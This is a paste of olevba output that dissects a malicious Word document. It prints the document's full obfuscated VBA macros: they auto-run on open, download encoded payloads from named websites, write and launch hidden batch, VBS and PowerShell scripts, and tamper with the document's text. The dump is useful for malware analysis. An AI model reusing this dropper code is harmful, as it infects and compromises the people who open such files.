Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB- origin~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: origin~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: origin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Jiqjdojksasndjkbqw_Open()
- End Sub
- Sub Xqkjdlkasjdklwlqds_Open()
- End Sub
- Sub Auto_Open()
- Ewjklasjdklasska
- Kjidjandjkhqwhd
- End Sub
- Sub Ewjklasjdklasska()
- ANJKDQW = "qhwkjekj2 k1hkeh12eh1 sa"
- End Sub
- Sub Xjdklqjds()
- HBQUHDQ = "21kjek 21hjeh12ke"
- End Sub
- Sub AutoOpen()
- Auto_Open
- End Sub
- Sub Workbook_Open()
- NJQKDBJQ = "kj2eh jk12hjek 12hjke "
- Auto_Open
- End Sub
- Sub Kjidjandjkhqwhd()
- Dim asjiw As Integer, woweffect As Integer, jwasssssdas As Integer, asdsssssjqwdq As Integer
- Dim retVal As Variant, huwe As Integer, auwd As Integer, aabbb As Integer, BLAHUWDHS As String, YYDBHWD As String
- YYDBHWD = Chr(90 + 2)
- YUGQYD = Ubqhwdhwqbd(23269) + ""
- BLAHUWDHS = Chr(84) & "em" + "p"
- QHDQUWH = YUGQYD
- FL2 = QHDQUWH
- PH2 = Module2.Goabc(BLAHUWDHS) + YYDBHWD
- woweffect = 6
- jwnqdw = 1 - woweffect
- JIQWDJQ = 12312312
- JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw)
- AAAA = JIQWDJQ
- HYWDAX = "baji dahjkhdiqdq uhst"
- JWIDJIAAA = ""
- HUYFEA = "jh qjksh jkhjk hjkh djkasd"
- QIWJDABB = "b"
- HUYFEA = QIWJDABB + "a" + "t"
- IUQJWD = "ajhdqu iydhiuh2hjg h"
- PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
- huwe = NUqwdqwbdsad(1 - 300 * Sin(20))
- SSS = Chr(AAAA + 2 + huwe)
- VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
- BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + huwe + 2) + HUYFEA
- INTG = "" & "o" & "bject"
- KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "d" + "" + "ul" + "e"
- AFTG = "m" & KIWD
- SXEE = Chr(46)
- SXAA = Chr(101)
- SXE = SXEE & SXAA & "" & "xe"
- GNG = "" & ".jpg" & ""
- HUQD = Chr(30 + 16 + 1)
- ATTH = "ht" & "t" & "" & "p" & ":" & "/" & "/"
- SPIC = Chr(100 + 15) + "av" & "epi" + "c." & "s" & "u" + HUQD
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = "hkjackjh kjh bhjsb"
- ABPTH = PH2 + BAFL
- BAPTH = ABPTH
- Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
- DRT = 315
- BFT = 316
- CFT = 317
- DFT = 318
- EFT = 319
- Dim NUWDHUQHUQWDH As String
- NUWDHUQHUQWDH = "USE" & "RPROFILE"
- Dim PBIn As String, asdwq As String, MIWDWQ As String
- TSTS = "." + "t" + "xt"
- CDDD = "6727156315273" + TSTS
- LNSS = "kaka" + TSTS
- STT1 = "midwestlabradoodle.com/w" + "p-content/pl" + "ugins/really-simple-captcha/"
- STT2 = "artyouneed.com/w" + "p-includes/t" + "heme-compat/"
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Jhuqwhdhsss(PBIn)
- asdwq = Rasdas(CONT)
- HQUWDAAA = "0"
- If (asdwq <> "=") Then
- PBIn = ATTH + STT2 + CDDD
- CONT = Module2.Jhuqwhdhsss(PBIn)
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- CONT = Quqhwdbyas(asdwq)
- Dim ahuywdgqy As String
- TVT10 = Port(CONT, "t" + "ext10")
- TVT20 = Port(CONT, "text20")
- TVT21 = Port(CONT, "text21")
- TVT30 = Port(CONT, "text30")
- TVT31 = Port(CONT, "text31")
- XPT1 = Port(CONT, "stext1")
- XPT2 = Port(CONT, "stext2")
- XPT3 = Port(CONT, "stext3")
- WVR = Module2.Goabc(NUWDHUQHUQWDH)
- hufehu1 = InStr(WVR, "sers\")
- Dim hudhw As Integer
- Dim ghdAdd(1 To 3)
- ghdAdd(1) = "1"
- ghdAdd(2) = "0"
- ghdAdd(3) = "0"
- If (hufehu1 <> 0) Then
- ghdAdd(1) = "2"
- Else
- ghdAdd(2) = "3"
- End If
- JHWQUD = Join(ghdAdd)
- hudhw = Val(JHWQUD)
- Module2.WaitFor (1)
- MIWDWQ = ATTH + STT1 + LNSS
- If (HQUWDAAA = "1") Then
- MIWDWQ = ATTH + STT2 + LNSS
- End If
- SEXX = Module2.Jhuqwhdhsss(MIWDWQ)
- PSTB = PBIn + "123123123"
- MSTAR1 = SPIC + "5751812" + GNG
- MSTAR2 = SPIC + "5757956" + GNG
- STAR1 = ATTH + MSTAR1
- STAR2 = ATTH + MSTAR2
- FFQ = "8"
- FF = FFQ + SXE
- If (hudhw = 130) Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module2.WaitFor (1)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- BDDT.WaitFor (1)
- NTH1 = Module1.GHJgwqdjqgw(retVal, BAPTH)
- End If
- HUDQG = "';"
- If (hudhw = 200) Then
- ZPQSKD = FL2
- Open PSPTH For Output As #CFT
- Print #CFT, "$ujdkwq = 'jqwdb';"
- Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + HUDQG
- Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- Print #EFT, "@" + "ec" + "ho off"
- Print #EFT, ":hqwdjkhqw"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, ":nqjwkdkqwd"
- Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
- Print #EFT, ":qbjdhwqbdwqh"
- Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module2.WaitFor (1)
- NTH2 = Module1.GHJgwqdjqgw(retVal, BAPTH)
- End If
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module1.Thwqbdhjabs(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module1.Thwqbdhjabs(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module1.Thwqbdhjabs(AKK + INTG + ZKK, "", 3)
- NTH6 = Module1.Thwqbdhjabs(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module1.Thwqbdhjabs(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module1.Thwqbdhjabs(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- Public Function NUqwdqwbdsad(a As Integer)
- NUqwdqwbdsad = Sgn(a)
- End Function
- Public Function Ubqhwdhwqbd(a As Integer)
- Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
- End Function
- Public Function Quqhwdbyas(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
- nudqwd = Log10(100)
- asduiwhqdqiw = NUqwdqwbdsad(1 - nudqwd)
- QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
- Set objXML = CreateObject("" & QHDHUQW)
- Set objNode = objXML.createElement("b6" + "4")
- objNode.DataType = "bin.b" + Chr(97) + "se6" + "4"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Quqhwdbyas = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- Public Function Port(a, b As String)
- Dim krd, tent As Integer
- UQWD = "" & Chr(58 + 2)
- NDUW = "" & Chr(70 - 8)
- krd = InStr(1, a, UQWD + b + NDUW) + 8
- tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
- KLMN = Mid$(a, krd, tent)
- HUQHWDA = KLMN
- Port = HUQHWDA
- End Function
- Private Static Function Rasdas(a As String)
- Rasdas = Right(a, 1)
- End Function
- Private Static Function Log10(x)
- BYQGDJQ = "hadkjhasdksahk hjksgdhw"
- Log10 = Log(x) / Log(10#)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: origin~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function GHJgwqdjqgw(a As Variant, b)
- JKDHAKSD = "qwdnmqw,mdn,mq ,mn q,wd2"
- a = Shell(b, 0)
- GHJgwqdjqgw = a
- End Function
- Public Function Thwqbdhjabs(dnuwhd As String, b As String, c As Integer)
- Dim selectedText As String
- Dim wwkjdasjdljslqlkjdklqjwdlkas As Range, lesleslesqjhdjqkwhdwq As Range
- Set wwkjdasjdljslqlkjdklqjwdlkas = ActiveDocument.Range
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- With wwkjdasjdljslqlkjdklqjwdlkas.Find
- 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- .Text = dnuwhd
- .MatchWholeWord = True
- wwkjdasjdljslqlkjdklqjwdlkas.Find.Execute
- wwkjdasjdljslqlkjdklqjwdlkas.Collapse direction:=wdCollapseEnd
- Dim wdwq As String
- Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
- Dim wdsadwq As String
- lesleslesqjhdjqkwhdwq.Start = wwkjdasjdljslqlkjdklqjwdlkas.End
- .Text = b
- .MatchWholeWord = True
- .Execute
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- wwkjdasjdljslqlkjdklqjwdlkas.Collapse direction:=wdCollapseStart
- lesleslesqjhdjqkwhdwq.End = wwkjdasjdljslqlkjdklqjwdlkas.Start
- If (c = 1) Then
- selectedText = lesleslesqjhdjqkwhdwq.Delete
- End If
- If (c = 2) Then
- lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
- End If
- Dim hduwaa As Integer
- hduwaa = 1 - 423
- If (c = 3) Then
- With wwkjdasjdljslqlkjdklqjwdlkas.Find
- .Text = a
- .Replacement.Text = "" & " "
- 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- 'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- Public Function Moloko(a, b, c)
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- Moloko = Mid(a, b, c)
- ASDQFQW = "jh21eg hj12ghejg12 "
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: origin~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Goabc(sps As String)
- Goabc = Environ(sps)
- End Function
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- Public Function Jhuqwhdhsss(a As String)
- Dim ygwdg As Integer, Sduhqiuwhdagshdjqgwqwg As Object
- Dim ggFw As String
- ggFw = a
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- BQDHJQWDGWQJGS = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & Chr(84) & Chr(84) & Chr(80)
- Set Sduhqiuwhdagshdjqgwqwg = CreateObject(BQDHJQWDGWQJGS)
- Sduhqiuwhdagshdjqgwqwg.Open "G" & "" & "ET", ggFw
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- Sduhqiuwhdagshdjqgwqwg.Send ("")
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
- Jhuqwhdhsss = Sduhqiuwhdagshdjqgwqwg.responsetext
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+--------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement